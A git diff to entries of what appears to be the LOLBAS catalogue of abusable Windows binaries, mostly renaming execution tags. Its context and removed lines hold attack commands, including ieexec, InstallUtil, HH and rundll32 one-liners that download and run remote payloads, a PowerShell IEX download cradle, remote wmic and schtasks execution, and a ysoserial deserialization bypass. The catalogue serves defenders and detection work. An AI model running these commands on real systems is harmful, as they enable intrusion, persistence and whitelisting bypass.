diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7ff3145..2556476 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetObjets + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 1239772..80c5faa 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.002 OperatingSystem: Windows 7 or older Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index bccde85..5bd76aa 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -22,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 3dca837..cd076da 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: 
diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a3..d8beeea 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index e861cd2..fd09acc 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,8 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. + Tags: + - Execute: EXE + - Application: GUI Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -20,7 +21,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: HH.exe http://some.url/payload.chm + - Application: GUI Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 3b659dd..f397b37 100644 
--- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 8a07010..c9f29fe 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e7198..3a5f5a6 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d76aca..cd12895 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -22,8 +22,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -32,8 +31,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7cbe41a..dab5e49 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -20,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index da29e92..04ff916 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -21,7 +21,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -39,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections 
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 92390c1..7de2d33 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,6 +51,8 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: + - Execute: MSI + - Execute: MST - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 00863c9..a5314d1 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 1e6d760..b1fde20 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 5d60b29..d1941d1 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -22,15 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution 
@@ -40,15 +32,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -75,8 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL - - Execute: EXE + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 535aeff..330ae0d 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 82f9ab2..a938e76 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 2fbd1f6..975c831 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 27a9f12..7b12cf3 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 3d0cdd5..2ab7e48 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index e42e6b7..55724db 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 49d52ef..5cb953c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system 
@@ -30,7 +30,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index e7d9b93..f7fbc3c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index e9ce1bd..57a163a 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index a96fe54..b83e0e7 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 6ee5a3f..e75c0a6 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7514068..52e973e 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 29b58e9..608f69d 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 250f100..a57f1b9 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 59a4a8c..b23da74 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 783eea7..963cf0b 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml 
@@ -12,7 +12,6 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: EXE - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 10e39e5..7f71efb 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 5e16964..cb86feb 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 5f0e156..7e375cc 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -32,8 +32,7 @@ Commands: MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD - - Execute: Remote + - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 4014064..23154c1 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 3517a54..5e95bac 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index bae245e..2a15866 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index 61b19ef..a72e4b6 100644 
